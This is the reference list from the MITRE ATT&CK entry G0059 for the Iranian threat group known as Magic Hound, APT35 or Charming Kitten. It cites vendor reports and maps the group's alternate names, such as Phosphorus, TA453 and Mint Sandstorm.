[2] ClearSky Kittens Back 3 August 2020: ClearSky Research Team. (2020, August 1). The Kittens Are Back in Town 3 - Charming Kitten Campaign Evolved and Deploying Spear-Phishing link by WhatsApp. Retrieved April 21, 2021.
[3] Certfa Charming Kitten January 2021: Certfa Labs. (2021, January 8). Charming Kitten's Christmas Gift. Retrieved May 3, 2021.
[4] Secureworks COBALT ILLUSION Threat Profile: Secureworks. (n.d.). COBALT ILLUSION Threat Profile. Retrieved April 14, 2021.
[5] Proofpoint TA453 July2021: Miller, J. et al. (2021, July 13). Operation SpoofedScholars: A Conversation with TA453. Retrieved August 18, 2021.
[6] Associated group name APT35: (Citation: FireEye APT35 2018)(Citation: Certfa Charming Kitten January 2021)(Citation: Check Point APT35 CharmPower January 2022)
[7] Associated group name COBALT ILLUSION: (Citation: Secureworks COBALT ILLUSION Threat Profile)
[8] Associated group name Charming Kitten: (Citation: ClearSky Charming Kitten Dec 2017)(Citation: Eweek Newscaster and Charming Kitten May 2014)(Citation: ClearSky Kittens Back 2 Oct 2019)(Citation: ClearSky Kittens Back 3 August 2020)(Citation: Proofpoint TA453 March 2021)(Citation: Check Point APT35 CharmPower January 2022)
[9] Check Point APT35 CharmPower January 2022: Check Point. (2022, January 11). APT35 exploits Log4j vulnerability to distribute new modular PowerShell toolkit. Retrieved January 24, 2022.
[10] ClearSky Charming Kitten Dec 2017: ClearSky Cyber Security. (2017, December). Charming Kitten. Retrieved December 27, 2017.
[11] ClearSky Kittens Back 2 Oct 2019: ClearSky Research Team. (2019, October 1). The Kittens Are Back in Town 2 - Charming Kitten Campaign Keeps Going on, Using New Impersonation Methods. Retrieved April 21, 2021.
[12] Eweek Newscaster and Charming Kitten May 2014: Kerner, S. (2014, May 29). Newscaster Threat Uses Social Media for Intelligence Gathering. Retrieved April 14, 2021.
[13] IBM ITG18 2020: Wikoff, A. and Emerson, R. (2020, July 16). New Research Exposes Iranian Threat Group Operations. Retrieved March 8, 2021.
[14] Associated group name ITG18: (Citation: IBM ITG18 2020)
[15] Associated group name Magic Hound: (Citation: Unit 42 Magic Hound Feb 2017)
[16] Microsoft Phosphorus Mar 2019: Burt, T. (2019, March 27). New steps to protect customers from hacking. Retrieved May 27, 2020.
[17] Microsoft Phosphorus Oct 2020: Burt, T. (2020, October 28). Cyberattacks target international conference attendees. Retrieved March 8, 2021.
[18] Microsoft Threat Actor Naming July 2023: Microsoft. (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.
[19] Associated group name Mint Sandstorm: (Citation: Microsoft Threat Actor Naming July 2023)
[20] Associated group name Newscaster: Link analysis of infrastructure and tools revealed a potential relationship between Magic Hound and the older attack campaign called Newscaster (aka Newscasters). (Citation: Unit 42 Magic Hound Feb 2017)(Citation: FireEye APT35 2018)
[21] Associated group name Phosphorus: (Citation: Microsoft Phosphorus Mar 2019)(Citation: Microsoft Phosphorus Oct 2020)(Citation: US District Court of DC Phosphorus Complaint 2019)(Citation: Certfa Charming Kitten January 2021)(Citation: Proofpoint TA453 March 2021)(Citation: Check Point APT35 CharmPower January 2022)
[22] Proofpoint TA453 March 2021: Miller, J. et al. (2021, March 30). BadBlood: TA453 Targets US and Israeli Medical Research Personnel in Credential Phishing Campaigns. Retrieved May 4, 2021.
[23] Associated group name TA453: (Citation: Proofpoint TA453 March 2021)(Citation: Proofpoint TA453 July2021)(Citation: Check Point APT35 CharmPower January 2022)
[24] US District Court of DC Phosphorus Complaint 2019: US District Court of DC. (2019, March 14). MICROSOFT CORPORATION v. JOHN DOES 1-2, CONTROLLING A COMPUTER NETWORK AND THEREBY INJURING PLAINTIFF AND ITS CUSTOMERS. Retrieved March 8, 2021.
[25] Unit 42 Magic Hound Feb 2017: Lee, B. and Falcone, R. (2017, February 15). Magic Hound Campaign Attacks Saudi Targets. Retrieved December 27, 2017.
[26] External ID: mitre-attack G0059
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.